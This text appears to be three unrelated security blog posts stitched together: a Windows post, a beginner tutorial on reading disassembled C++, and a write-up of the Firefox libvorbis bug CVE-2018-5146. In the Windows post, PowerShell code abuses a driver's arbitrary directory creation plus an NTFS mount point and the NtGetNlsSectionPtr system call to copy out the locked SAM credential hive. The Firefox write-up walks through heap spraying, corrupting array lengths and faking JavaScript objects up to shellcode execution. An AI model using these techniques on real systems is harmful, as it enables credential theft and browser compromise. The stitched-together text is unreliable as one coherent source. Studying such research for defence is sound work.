If you want to follow along you’ll need to setup a Windows 10 VM (doesn’t matter if it’s 32 or 64 bit) and follow the details in setup.txt from the zip file containing my Workshop driver. Then you’ll need to install the NtObjectManager Powershell Module. It’s available on the Powershell Gallery, which is an online module repository so follow the details there.

Assuming that’s all done, let’s get to work. First let’s look how we can call the vulnerable code in the driver. The driver exposes a Device Object to the user with the name \Device\WorkshopDriver (we can see the setup in the source code). All “vulnerabilities” are then exercised by sending Device IO Control requests to the device object. The code for the IO Control handling is in device_control.c and we’re specifically interested in the dispatch. The code ControlCreateDir is the one we’re looking for, it takes the input data from the user and uses that as an unchecked UNICODE_STRING to pass to the code to create the directory. If we look up the code to create the IOCTL number we find ControlCreateDir is 2, so let’s use the following PS code to create an arbitrary directory.

 

Import-Module NtObjectManager

# Get an IOCTL for the workshop driver.
function Get-DriverIoCtl {
   Param([int]$ControlCode)
   [NtApiDotNet.NtIoControlCode]::new(«Unknown»,`
       0x800 bor $ControlCode, «Buffered», «Any»)
}

function New-Directory {
 Param([string]$Filename)
 # Open the device driver.
 Use-NtObject($file = Get-NtFile \Device\WorkshopDriver) {
   # Get IOCTL for ControlCreateDir (2)
   $ioctl = Get-DriverIoCtl ControlCode 2
   # Convert DOS filename to NT
   $nt_filename = [NtApiDotNet.NtFileUtils]::DosFileNameToNt($Filename)
   $bytes = [Text.Encoding]::Unicode.GetBytes($nt_filename)
   $file.DeviceIoControl($ioctl, $bytes, 0) | Out-Null
 }
}

 

The New-Directory function first opens the device object, converts the path to a native NT format as an array of bytes and calls the DeviceIoControl function on the device. We could just pass an integer value for control code but the NT API libraries I wrote have an NtIoControlCode type to pack up the values for you. Let’s try it and see if it works to create the directory c:\windows\abc.


It works and we’ve successfully created the arbitrary directory. Just to check we use Get-Acl to get the Security Descriptor of the directory and we can see that the owner is the ‘user’ account which means we can get full access to the directory.

Now the problem is what to do with this ability? There’s no doubt some system service which might look up in a list of directories for an executable to run or a configuration file to parse. But it’d be nice not to rely on something like that. As the title suggested instead we’ll convert this into an arbitrary file read, how might do we go about doing that?

Mount Point Abuse

If you’ve watched my talk on Abusing Windows Symbolic Links you’ll know how NTFS mount points (or sometimes Junctions) work. The $REPARSE_POINT NTFS attribute is stored with the Directory which the NTFS driver reads when opening a directory. The attribute contains an alternative native NT object manager path to the destination of the symbolic link which is passed back to the IO manager to continue processing. This allows the Mount Point to work between different volumes, but it does have one interesting consequence. Specifically the path doesn’t have to actually to point to another directory, what if we give it a path to a file?

 

If you use the Win32 APIs it will fail and if you use the NT apis directly you’ll find you end up in a weird paradox. If you try and open the mount point as a file the error will say it’s a directory, and if you instead try to open as a directory it will tell you it’s really a file. Turns out if you don’t specify either FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE then the NTFS driver will pass its checks and the mount point can actually redirect to a file.

Perhaps we can find some system service which will open our file without any of these flags (if you pass FILE_FLAG_BACKUP_SEMANTICS to CreateFile this will also remove all flags) and ideally get the service to read and return the file data?

National Language Support

Windows supports many different languages, and in order to support non-unicode encodings still supports Code Pages. A lot is exposed through the National Language Support (NLS) libraries, and you’d assume that the libraries run entirely in user mode but if you look at the kernel you’ll find a few system calls here and there to support NLS. The one of most interest to this blog is the NtGetNlsSectionPtr system call. This system call maps code page files from the System32 directory into a process’ memory where the libraries can access the code page data. It’s not entirely clear why it needs to be in kernel mode, perhaps it’s just to make the sections shareable between all processes on the same machine. Let’s look at a simplified version of the code, it’s not a very big function:

 

NTSTATUS NtGetNlsSectionPtr(DWORD NlsType,

                           DWORD CodePage,
                           PVOID *SectionPointer,

                           PULONG SectionSize) {
 UNICODE_STRING section_name;
 OBJECT_ATTRIBUTES section_obj_attr;
 HANDLE section_handle;
 RtlpInitNlsSectionName(NlsType, CodePage, &section_name);
 InitializeObjectAttributes(&section_obj_attr,

                            &section_name,
                            OBJ_KERNEL_HANDLE |

                            OBJ_OPENIF |

                            OBJ_CASE_INSENSITIVE |

                            OBJ_PERMANENT);
    
 // Open section under \NLS directory.
 if (!NT_SUCCESS(ZwOpenSection(&section_handle,

                        SECTION_MAP_READ,

                        &section_obj_attr))) {
   // If no section then open the corresponding file and create section.
   UNICODE_STRING file_name;

   OBJECT_ATTRIBUTES obj_attr;
   HANDLE file_handle;


   RtlpInitNlsFileName(NlsType,

                       CodePage,

                       &file_name);
   InitializeObjectAttributes(&obj_attr,

                              &file_name,
                              OBJ_KERNEL_HANDLE |

                              OBJ_CASE_INSENSITIVE);
   ZwOpenFile(&file_handle, SYNCHRONIZE,

              &obj_attr, FILE_SHARE_READ, 0);
   ZwCreateSection(&section_handle, FILE_MAP_READ,

                   &section_obj_attr, NULL,

                   PROTECT_READ_ONLY, MEM_COMMIT, file_handle);
   ZwClose(file_handle);
 }

 // Map section into memory and return pointer.
 NTSTATUS status = MmMapViewOfSection(

                     section_handle,
                     SectionPointer,
                     SectionSize);
 ZwClose(section_handle);
 return status;
}

 

The first thing to note here is it tries to open a named section object under the \NLS directory using a name generated from the CodePage parameter. To get an idea what that name looks like we’ll just list that directory:


The named sections are of the form NlsSectionCP<NUM> where NUM is the number of the code page to map. You’ll also notice there’s a section for a normalization data set. Which file gets mapped depends on the first NlsType parameter, we don’t care about normalization for the moment. If the section object isn’t found the code builds a file path to the code page file, opens it with ZwOpenFile and then calls ZwCreateSection to create a read-only named section object. Finally the section is mapped into memory and returned to the caller.

 

There’s two important things to note here, first the OBJ_FORCE_ACCESS_CHECK flag is not being set for the open call. This means the call will open any file even if the caller doesn’t have access to it. And most importantly the final parameter of ZwOpenFile is 0, this means neither FILE_DIRECTORY_FILE or FILE_NON_DIRECTORY_FILE is being set. Not setting these flags will result in our desired condition, the open call will follow the mount point redirection to a file and not generate an error. What is the file path set to? We can just disassemble RtlpInitNlsFileName to find out:

 

void RtlpInitNlsFileName(DWORD NlsType,

                        DWORD CodePage,

                        PUNICODE_STRING String) {
 if (NlsType == NLS_CODEPAGE) {
    RtlStringCchPrintfW(String,

             L»\\SystemRoot\\System32\\c_%.3d.nls», CodePage);
 } else {
    // Get normalization path from registry.
    // NOTE about how this is arbitrary registry write to file.
 }
}

 

The file is of the form c_<NUM>.nls under the System32 directory. Note that it uses the special symbolic link \SystemRoot which points to the Windows directory using a device path format. This prevents this code from being abused by redirecting drive letters and making it an actual vulnerability. Also note that if the normalization path is requested the information is read out from a machine registry key, so if you have an arbitrary registry value writing vulnerability you might be able to exploit this system call to get another arbitrary read, but that’s for the interested reader to investigate.

 

I think it’s clear now what we have to do, create a directory in System32 with the name c_<NUM>.nls, set its reparse data to point to an arbitrary file then use the NLS system call to open and map the file. Choosing a code page number is easy, 1337 is unused. But what file should we read? A common file to read is the SAM registry hive which contains logon information for local users. However access to the SAM file is usually blocked as it’s not sharable and even just opening for read access as an administrator will fail with a sharing violation. There’s of course a number of ways you can get around this, you can use the registry backup functions (but that needs admin rights) or we can pull an old copy of the SAM from a Volume Shadow Copy (which isn’t on by default on Windows 10). So perhaps let’s forget about… no wait we’re in luck.

 

File sharing on Windows files depends on the access being requested. For example if the caller requests Read access but the file is not shared for read access then it fails. However it’s possible to open a file for certain non-content rights, such as reading the security descriptor or synchronizing on the file object, rights which are not considered when checking the existing file sharing settings. If you look back at the code for NtGetNlsSectionPtr you’ll notice the only access right being requested for the file is SYNCHRONIZE and so will always allow the file to be opened even if locked with no sharing access.

 

But how can that work? Doesn’t ZwCreateSection need a readable file handle to do the read-only file mapping. Yes and no. Windows file objects do not really care whether a file is readable or writable. Access rights are associated with the handle created when the file is opened. When you call ZwCreateSection from user-mode the call eventually tries to convert the handle to a pointer to the file object. For that to occur the caller must specify what access rights need to be on the handle for it to succeed, for a read-only mapping the kernel requests the handle has Read Data access. However just as with access checking with files if the kernel calls ZwCreateSection access checking is disabled including when converting a file handle to the file object pointer. This results in ZwCreateSection succeeding even though the file handle only has SYNCHRONIZE access. Which means we can open any file on the system regardless of it’s sharing mode and that includes the SAM file.

 

So let’s put the final touches to this, we create the directory \SystemRoot\System32\c_1337.nls and convert it to a mount point which redirects to \SystemRoot\System32\config\SAM. Then we call NtGetNlsSectionPtr requesting code page 1337, which creates the section and returns us a pointer to it. Finally we just copy out the mapped file memory into a new file and we’re done.

 

$dir = «\SystemRoot\system32\c_1337.nls»
New-Directory $dir
 
$target_path = «\SystemRoot\system32\config\SAM»
Use-NtObject($file = Get-NtFile $dir `

            —Options OpenReparsePoint,DirectoryFile) {
 $file.SetMountPoint($target_path, $target_path)
}

Use-NtObject($map =

    [NtApiDotNet.NtLocale]::GetNlsSectionPtr(«CodePage», 1337)) {
 Use-NtObject($output = [IO.File]::OpenWrite(«sam.bin»)) {
   $map.GetStream().CopyTo($output)
   Write-Host «Copied file»
 }
}

 

Loading the created file in a hex editor shows we did indeed steal the SAM file.


For completeness we’ll clean up our mess. We can just delete the directory by opening the directory file with the Delete On Close flag and then closing the file (making sure to open it as a reparse point otherwise you’ll try and open the SAM again). For the section as the object was created in our security context (just like the directory) and there was no explicit security descriptor then we can open it for DELETE access and call ZwMakeTemporaryObject to remove the permanent reference count set by the original creator with the OBJ_PERMANENT flag.

 

Use-NtObject($sect = Get-NtSection \nls\NlsSectionCP1337 `
                   Access Delete) {
 # Delete permanent object.
 $sect.MakeTemporary()
}

What I’ve described in this blog post is not a vulnerability, although certainly the code doesn’t seem to follow best practice. It’s a system call which hasn’t changed since at least Windows 7 so if you find yourself with an arbitrary directory creation vulnerability you should be able to use this trick to read any file on the system regardless of whether it’s already open or shared. I’ve put the final script on GITHUB at this link if you want the final version to get a better understanding of how it works.

 

It’s worth keeping a log of any unusual behaviours when you’re reverse engineering a product in case it becomes useful as I did in this case. Many times I’ve found code which isn’t itself a vulnerability but have has some useful properties which allow you to build out exploitation chains.

Reverse Engineering Basic Programming Concepts

Reverse Engineering

Throughout the reverse engineering learning process I have found myself wanting a straightforward guide for what to look for when browsing through assembly code. While I’m a big believer in reading source code and manuals for information, I fully understand the desire to have concise, easy to comprehend, information all in one place. This “BOLO: Reverse Engineering” series is exactly that! Throughout this article series I will be showing you things to BOn the Look Out for when reverse engineering code. Ideally, this article series will make it easier for beginner reverse engineers to get a grasp on many different concepts!

Preface

Throughout this article you will see screenshots of C++ code and assembly code along with some explanation as to what you’re seeing and why things look the way they look. Furthermore, This article series will not cover the basics of assembly, it will only present patterns and decompiled code so that you can get a general understanding of what to look for / how to interpret assembly code.

Throughout this article we will cover:

  1. Variable Initiation
  2. Basic Output
  3. Mathematical Operations
  4. Functions
  5. Loops (For loop / While loop)
  6. Conditional Statements (IF Statement / Switch Statement)
  7. User Input

please note: This tutorial was made with visual C++ in Microsoft Visual Studio 2015 (I know, outdated version). Some of the assembly code (i.e. user input with cin) will reflect that. Furthermore, I am using IDA Pro as my disassembler.


Variable Initiation

Variables are extremely important when programming, here we can see a few important variables:

  1. a string
  2. an int
  3. a boolean
  4. a char
  5. a double
  6. a float
  7. a char array
Basic Variables

Please note: In C++, ‘string’ is not a primitive variable but I thought it important to show you anyway.

Now, lets take a look at the assembly:

Initiating Variables

Here we can see how IDA represents space allocation for variables. As you can see, we’re allocating space for each variable before we actually initialize them.

Initializing Variables

Once space is allocated, we move the values that we want to set each variable to into the space we allocated for said variable. Although the majority of the variables are initialized here, below you will see the C++ string initiation.

C++ String Initiation

As you can see, initiating a string requires a call to a built in function for initiation.

Basic Output

preface info: Throughout this section I will be talking about items pushed onto the stack and used as parameters for the printf function. The concept of function parameters will be explained in better detail later in this article.

Although this tutorial was built in visual C++, I opted to use printf rather than cout for output.

Basic Output

Now, let’s take a look at the assembly:

First, the string literal:

String Literal Output

As you can see, the string literal is pushed onto the stack to be called as a parameter for the printf function.

Now, let’s take a look at one of the variable outputs:

Variable Output

As you can see, first the intvar variable is moved into the EAX register, which is then pushed onto the stack along with the “%i” string literal used to indicate integer output. These variables are then taken from the stack and used as parameters when calling the printf function.

Mathematical Functions

In this section, we’ll be going over the following mathematical functions:

  1. Addition
  2. Subtraction
  3. Multiplication
  4. Division
  5. Bitwise AND
  6. Bitwise OR
  7. Bitwise XOR
  8. Bitwise NOT
  9. Bitwise Right-Shift
  10. Bitwise Left-Shift
Mathematical Functions Code

Let’s break each function down into assembly:

First, we set A to hex 0A, which represents decimal 10, and to hex 0F, which represents decimal 15.

Variable Setting

We add by using the ‘add’ opcode:

Addition

We subtract using the ‘sub’ opcode:

Subtraction

We multiply using the ‘imul’ opcode:

Multiplication

We divide using the ‘idiv’ opcode. In this case, we also use the ‘cdq’ to double the size of EAX so that we can fit the output of the division operation.

Division

We perform the Bitwise AND using the ‘and’ opcode:

Bitwise AND

We perform the Bitwise OR using the ‘or’ opcode:

Bitwise OR

We perform the Bitwise XOR using the ‘xor’ opcode:

Bitwise XOR

We perform the Bitwise NOT using the ‘not’ opcode:

Bitwise NOT

We peform the Bitwise Right-Shift using the ‘sar’ opcode:

Bitwise Right-Shift

We perform the Bitwise Left-Shift using the ‘shl’ opcode:

Bitwise Left-Shift

Function Calls

In this section, we’ll be looking at 3 different types of functions:

  1. a basic void function
  2. a function that returns an integer
  3. a function that takes in parameters

Calling Functions

First, let’s take a look at calling newfunc() and newfuncret() because neither of those actually take in any parameters.

Calling Functions Without Parameters

If we follow the call to the newfunc() function, we can see that all it really does is print out “Hello! I’m a new function!”:

The newfunc() Function Code
The newfunc() Function

As you can see, this function does use the retn opcode but only to return back to the previous location (so that the program can continue after the function completes.) Now, let’s take a look at the newfuncret() function which generates a random integer using the C++ rand() function and then returns said integer.

The newfuncret() Function Code
The newfuncret() function

First, space is allocated for the A variable. Then, the rand() function is called, which returns a value into the EAX register. Next, the EAX variable is moved into the A variable space, effectively setting A to the result of rand(). Finally, the A variable is moved into EAX so that the function can use it as a return value.

Now that we have an understanding of how to call function and what it looks like when a function returns something, let’s talk about calling functions with parameters:

First, let’s take another look at the call statement:

Calling a Function with Parameters in C++
Calling a Function with Parameters

Although strings in C++ require a call to a basic_string function, the concept of calling a function with parameters is the same regardless of data type. First ,you move the variable into a register, then you push the registers on the stack, then you call the function.

Let’s take a look at the function’s code:

The funcparams() Function Code
The funcparams() Function

All this function does is take in a string, an integer, and a character and print them out using printf. As you can see, first the 3 variables are allocated at the top of the function, then these variables are pushed onto the stack as parameters for the printf function. Easy Peasy.

Loops

Now that we have function calling, output, variables, and math down, let’s move on to flow control. First, we’ll start with a for loop:

For Loop Code
A graphical Overview of the For Loop

Before we break down the assembly code into smaller sections, let’s take a look at the general layout. As you can see, when the for loop starts, it has 2 options; It can either go to the box on the right (green arrow) and return, or it can go to the box on the left (red arrow) and loop back to the start of the for loop.

Detailed For Loop

First, we check if we’ve hit the maximum value by comparing the i variable to the max variable. If the i variable is not greater than or equal to the maxvariable, we continue down to the left and print out the i variable then add 1 to i and continue back to the start of the loop. If the i variable is, in fact, greater than or equal to max, we simply exit the for loop and return.

Now, let’s take a look at a while loop:

While Loop Code
While Loop

In this loop, all we’re doing is generating a random number between 0 and 20. If the number is greater than 10, we exit the loop and print “I’m out!” otherwise, we continue to loop.

In the assembly, the A variable is generated and set to 0 originally, then we initialize the loop by comparing A to the hex number 0A which represents decimal 10. If A is not greater than or equal to 10, we generate a new random number which is then set to A and we continue back to the comparison. If A is greater than or equal to 10, we break out of the loop, print out “I’m out” and then return.

If Statements

Next, we’ll be talking about if statements. First, let’s take a look at the code:

IF Statement Code

This function generates a random number between 0 and 20 and stores said number in the variable A. If A is greater than 15, the program will print out “greater than 15”. If A is less than 15 but greater than 10, the program will print out “less than 15, greater than 10”. This pattern will continue until A is less than 5, in which case the program will print out “less than 5”.

Now, let’s take a look at the assembly graph:

IF Statement Assembly Graph

As you can see, the assembly is structured similarly to the actual code. This is because IF statements are simply “If X Then Y Else Z”. IF we look at the first set of arrows coming out of the top section, we can see a comparison between the A variable and hex 0F, which represents decimal 15. If A is greater than or equal to 15, the program will print out “greater than 15” and then return. Otherwise, the program will compare A to hex 0A which represents decimal 10. This pattern will continue until the program prints and returns.

Switch Statements

Switch statements are a lot like IF statements except in a Switch statement one variable or statement is compared to a number of ‘cases’ (or possible equivalences). Let’s take a look at our code:

Switch Statement Code

In this function, we set the variable A to equal a random number between 0 and 10. Then, we compare A to a number of cases using a Switch statement. IfA is equal to any of the possible cases, the case number will be printed, and then the program will break out of the Switch statement and the function will return.

Now, let’s take a look at the assembly graph:

Switch Case Assembly Graph

Unlike IF statements, switch statements do not follow the “If X Then Y Else Z” rule, instead, the program simply compares the conditional statement to the cases and only executes a case if said case is the conditional statement’s equivalent. Le’ts first take a look at the initial 2 boxes:

The First 2 Graph Sections

First, the program generates a random number and sets it to A. Then, the program initializes the switch statement by first setting a temporary variable (var_D0) to equal A, then ensuring that var_D0 meets at least one of the possible cases. If var_D0 needs to default, the program follows the green arrow down to the final return section (see below). Otherwise, the program initiates a switch jump to the equivalent case’s section:

In the case that var_D0 (A) is equal to 5, the code will jump to the above case section, print out “5” and then jump to the return section.

User Input

In this section, we’ll cover user input using the C++ cin function. First, let’s look at the code:

User Input Code

In this function, we simply take in a string to the variable sentence using the C++ cin function and then we print out sentence through a printf statement.

Le’ts break this down into assembly. First, the C++ cin part:

C++ cin

This code simply initializes the string sentence then calls the cin function and sets the input to the sentence variable. Let’s take a look at the cin call a bit closer:

The C++ cin Function Upclose

First, the program sets the contents of the sentence variable to EAX, then pushes EAX onto the stack to be used as a parameter for the cin function which is then called and has it’s output moved into ECX, which is then put on the stack for the printf statement:

User Input printf Statement

Thanks!

Writeup for CVE-2018-5146 or How to kill a (Fire)fox – en

1. Debug Environment

  • OS
    • Windows 10
  • Firefox_Setup_59.0.exe
    • SHA1: 294460F0287BCF5601193DCA0A90DB8FE740487C
  • Xul.dll
    • SHA1: E93D1E5AF21EB90DC8804F0503483F39D5B184A9

2. Patch Infomation

The issue in Mozilla’s Bugzilla is Bug 1446062.
The vulnerability used in pwn2own 2018 is assigned with CVE-2018-5146.
From the Mozilla security advisory, we can see this vulnerability came from libvorbis – a third-party media library. In next section, I will introduce some base information of this library.

3. Ogg and Vorbis

3.1. Ogg

Ogg is a free, open container format maintained by the Xiph.Org Foundation.
One “Ogg file” consist of some “Ogg Page” and one “Ogg Page” contains one Ogg Header and one Segment Table.
The structure of Ogg Page can be illustrate as follow picture.

Pic.1 Ogg Page Structure

3.2. Vorbis

Vorbis is a free and open-source software project headed by the Xiph.Org Foundation.
In a Ogg file, data relative to Vorbis will be encapsulated into Segment Table inside of Ogg Page.
One MIT document show the process of encapsulation.

3.2.1. Vorbis Header

In Vorbis, there are three kinds of Vorbis Header. For one Vorbis bitstream, all three kinds of Vorbis header shound been set. And those Header are:

  • Vorbis Identification Header
    Basically define Ogg bitstream is in Vorbis format. And it contains some information such as Vorbis version, basic audio information relative to this bitstream, include number of channel, bitrate.
  • Vorbis Comment Header
    Basically contains some user define comment, such as Vendor infomation。
  • Vorbis Setup Header
    Basically contains information use to setup codec, such as complete VQ and Huffman codebooks used in decode.
3.2.2. Vorbis Identification Header

Vorbis Identification Header structure can be illustrated as follow:

Pic.2 Vorbis Identification Header Structure

3.2.3. Vorbis Setup Header

Vorbis Setup Heade Structure is more complicate than other headers, it contain some substructure, such as codebooks.
After “vorbis” there was the number of CodeBooks, and following with CodeBook Objcet corresponding to the number. And next was TimeBackends, FloorBackends, ResiduesBackends, MapBackends, Modes.
Vorbis Setup Header Structure can be roughly illustrated as follow:

Pic.3 Vorbis Setup Header Structure

3.2.3.1. Vorbis CodeBook

As in Vorbis spec, a CodeBook structure can be represent as follow:

byte 0: [ 0 1 0 0 0 0 1 0 ] (0x42)
byte 1: [ 0 1 0 0 0 0 1 1 ] (0x43)
byte 2: [ 0 1 0 1 0 1 1 0 ] (0x56)
byte 3: [ X X X X X X X X ]
byte 4: [ X X X X X X X X ] [codebook_dimensions] (16 bit unsigned)
byte 5: [ X X X X X X X X ]
byte 6: [ X X X X X X X X ]
byte 7: [ X X X X X X X X ] [codebook_entries] (24 bit unsigned)
byte 8: [ X ] [ordered] (1 bit)
byte 8: [ X 1 ] [sparse] flag (1 bit)

After the header, there was a length_table array which length equal to codebook_entries. Element of this array can be 5 bit or 6 bit long, base on the flag.
Following as VQ-relative structure:

[codebook_lookup_type] 4 bits
[codebook_minimum_value] 32 bits
[codebook_delta_value] 32 bits
[codebook_value_bits] 4 bits and plus one
[codebook_sequence_p] 1 bits

Finally was a VQ-table array with length equal to codebook_dimensions * codebook_entrue,element length Corresponding to codebood_value_bits.
Codebook_minimum_value and codebook_delta_value will be represent in float type, but for support different platform, Vorbis spec define a internal represent format of “float”, then using system math function to bake it into system float type. In Windows, it will be turn into double first than float.
All of above build a CodeBook structure.

3.2.3.2. Vorbis Time

In nowadays Vorbis spec, this data structure is nothing but a placeholder, all of it data should be zero.

3.2.3.3. Vorbis Floor

In recent Vorbis spec, there were two different FloorBackend structure, but it will do nothing relative to vulnerability. So we just skip this data structure.

3.2.3.4. Vorbis Residue

In recent Vorbis spec, there were three kinds of ResidueBackend, different structure will call different decode function in decode process. It’s structure can be presented as follow:

[residue_begin] 24 bits
[residue_end] 24 bits
[residue_partition_size] 24 bits and plus one
[residue_classifications] = 6 bits and plus one
[residue_classbook] 8 bits

The residue_classbook define which CodeBook will be used when decode this ResidueBackend.
MapBackend and Mode dose not have influence to exploit so we skip them too.

4. Patch analysis

4.1. Patched Function

From blog of ZDI, we can see vulnerability inside following function:

/* decode vector / dim granularity gaurding is done in the upper layer */
long vorbis_book_decodev_add(codebook *book, float *a, oggpack_buffer *b, int n)
{
if (book->used_entries > 0)
{
int i, j, entry;
float *t;

if (book->dim > 8)
{
for (i = 0; i < n;) {
entry = decode_packed_entry_number(book, b);
if (entry == -1) return (-1);
t = book->valuelist + entry * book->dim;
for (j = 0; j < book->dim;)
{
a[i++] += t[j++];
}
}
else
{
// blablabla
}
}
return (0);
}

Inside first if branch, there was a nested loop. Inside loop use a variable “book->dim” without check to stop loop, but it also change a variable “i” come from outer loop. So if ”book->dim > n”, “a[i++] += t[j++]” will lead to a out-of-bound-write security issue.

In this function, “a” was one of the arguments, and t was calculate from “book->valuelist”.

4.2. Buffer – a

After read some source , I found “a” was initialization in below code:

    /* alloc pcm passback storage */
vb->pcmend=ci->blocksizes[vb->W];
vb->pcm=_vorbis_block_alloc(vb,sizeof(*vb->pcm)*vi->channels);
for(i=0;ichannels;i++)
vb->pcm[i]=_vorbis_block_alloc(vb,vb->pcmend*sizeof(*vb->pcm[i]));

The “vb->pcm[i]” will be pass into vulnerable function as “a”, and it’s memory chunk was alloc by _vorbis_block_alloc with size equal to vb->pcmend*sizeof(*vb->pcm[i]).
And vb->pcmend come from ci->blocksizes[vb->W], ci->blocksizes was defined in Vorbis Identification Header.
So we can control the size of memory chunk alloc for “a”.
Digging deep into _vorbis_block_alloc, we can found this call chain _vorbis_block_alloc -> _ogg_malloc -> CountingMalloc::Malloc -> arena_t::Malloc, so the memory chunk of “a” was lie on mozJemalloc heap.

4.3. Buffer – t

After read some source code , I found book->valuelist get its value from here:

    c->valuelist=_book_unquantize(s,n,sortindex);

And the logic of _book_unquantize can be show as follow:

float *_book_unquantize(const static_codebook *b, int n, int *sparsemap)
{
long j, k, count = 0;
if (b->maptype == 1 || b->maptype == 2)
{
int quantvals;
float mindel = _float32_unpack(b->q_min);
float delta = _float32_unpack(b->q_delta);
float *r = _ogg_calloc(n * b->dim, sizeof(*r));

switch (b->maptype)
{
case 1:

quantvals=_book_maptype1_quantvals(b);

// do some math work

break;
case 2:

float val=b->quantlist[j*b->dim+k];

// do some math work

break;
}

return (r);
}
return (NULL);
}

So book->valuelist was the data decode from corresponding CodeBook’s VQ data.
It was lie on mozJemalloc heap too.

4.4. Cola Time

So now we can see, when the vulnerability was triggered:

  • a
    • lie on mozJemalloc heap;
    • size controllable.
  • t
    • lie on mozJemalloc heap too;
    • content controllable.
  • book->dim
    • content controllable.

Combine all thing above, we can do a write operation in mozJemalloc heap with a controllable offset and content.
But what about size controllable? Can this work for our exploit? Let’s see how mozJemalloc work.

5. mozJemalloc

mozJemalloc is a heap manager Mozilla develop base on Jemalloc.
Following was some global variables can show you some information about mozJemalloc.

  • gArenas
    • mDefaultArena
    • mArenas
    • mPrivateArenas
  • gChunkBySize
  • gChunkByAddress
  • gChunkRTress

In mozJemalloc, memory will be divide into Chunks, and those chunk will be attach to different Arena. Arena will manage chunk. User alloc memory chunk must be inside one of the chunks. In mozJemalloc, we call user alloc memory chunk as region.
And Chunk will be divide into run with different size.Each run will bookkeeping region status inside it through a bitmap structure.

5.1. Arena

In mozJemalloc, each Arena will be assigned with a id. When allocator need to alloc a memory chunk, it can use id to get corresponding Arena.
There was a structure call mBin inside Arena. It was a array, each element of it wat a arena_bin_t object, and this object manage all same size memory chunk in this Arena. Memory chunk size from 0x10 to 0x800 will be managed by mBin.
Run used by mBin can not be guarantee to be contiguous, so mBin using a red-black-tree to manage Run.

5.2. Run

The first one region inside a Run will be use to save Run manage information, and rest of the region can be use when alloc. All region in same Run have same size.
When alloc region from a Run, it will return first No-in-use region close to Run header.

5.3. Arena Partition

This now code branch in mozilla-central, all JavaScript memory alloc or free will pass moz_arena_ prefix function. And this function will only use Arena which id was 1.
In mozJemalloc, Arena can be a PrivateArena or not a PrivateArena. Arena with id 1 will be a PrivateArena. So it means that ogg buffer will not be in the same Arena with JavaScript Object.
In this situation, we can say that JavaScript Arena was isolated with other Arenas.
But in vulnerable Windows Firefox 59.0 does not have a PrivateArena, so that we can using JavaScript Object to perform a Heap feng shui to run a exploit.
First I was debug in a Linux opt+debug build Firefox, as Arena partition, it was hard to found a way to write a exploit, so far I can only get a info leak situation in Linux.

6. Exploit

In the section, I will show how to build a exploit base on this vulnerability.

6.1. Build Ogg file

First of all, we need to build a ogg file which can trigger this vulnerability, some of PoC ogg file data as follow:

Pic.4 PoC Ogg file partial data
We can see codebook->dim equal to 0x48。

6.2. Heap Spary

First we alloc a lot JavaScript avrray, it will exhaust all useable memory region in mBin, and therefore mozJemalloc have to map new memory and divide it into Run for mBin.
Then we interleaved free those array, therefore there will be many hole inside mBin, but as we can never know the original layout of mBin, and there can be other object or thread using mBin when we free array, the hole may not be interleaved.
If the hole is not interleaved, our ogg buffer may be malloc in a contiguous hole, in this situation, we can not control too much off data.
So to avoid above situation, after interleaved free, we should do some compensate to mBin so that we can malloc ogg buffer in a hole before a array.

6.3. Modify Array Length

After Heap Spary,we can use _ogg_malloc to malloc region in mozJemalloc heap.
So we can force a memory layout as follow:

|———————contiguous memory —————————|
[ hole ][ Array ][ ogg_malloc_buffer ][ Array ][ hole ]

And we trigger a out-of-bound write operation, we can modify one of the array’s length. So that we have a array object in mozJemalloc which can read out-of-bound.
Then we alloc many ArrayBuffer Object in mozJemalloc. Memory layout turn into following situation:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents ]

In this situation, we can use Array_length_modified to read/write ArrayBuffer_contents.
Finally memory will like this:

|——————————-contiguous memory —————————|
[ Array_length_modified ][ something ] … [ something ][ ArrayBuffer_contents_modified ]

6.4. Cola time again

Now we control those object and we can do:

  • Array_length_modified
    • Out-of-bound write
    • Out-of-bound read
  • ArrayBuffer_contents_modified
    • In-bound write
    • In-bound read

If we try to leak memory data from Array_length_modified, due to SpiderMonkey use tagged value, we will read “NaN” from memory.
But if we use Array_length_modified to write something in ArrayBuffer_contents_modified, and read it from ArrayBuffer_contents_modified. We can leak pointer of Javascript Object from memory.

6.5. Fake JSObject

We can fake a JSObject on memory by leak some pointer and write it into JavasScript Object. And we can write to a address through this Fake Object. (turn off baselineJIT will help you to see what is going on and following contents will base on baselineJIT disable)

Pic.5 Fake JavaScript Object

If we alloc two arraybuffer with same size, they will in contiguous memory inside JS::Nursery heap. Memory layout will be like follow

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

And we can change first arraybuffer’s metadata to make SpiderMonkey think it cover second arraybuffer by use fake object trick.

|———————contiguous memory —————————|
[ ArrayBuffer_1 ]
[ ArrayBuffer_2 ]

We can read/write to arbitrarily memory now.
After this, all you need was a ROP chain to get Firefox to your shellcode.

6.6. Pop Calc?

Finally we achieve our shellcode, process context as follow:

Pic.6 achieve shellcode
Corresponding memory chunk information as follow:

Pic.7 memory address information

But Firefox release have enable Sandbox as default, so if you try to pop calc through CreateProcess, Sandbox will block it.

7. Relative code and works

  1. Firefox Source Code
  2. OR’LYEH? The Shadow over Firefox by argp
  3. Exploiting the jemalloc Memory Allocator: Owning Firefox’s Heap by argp,haku
  4. QUICKLY PWNED, QUICKLY PATCHED: DETAILS OF THE MOZILLA PWN2OWN EXPLOIT by thezdi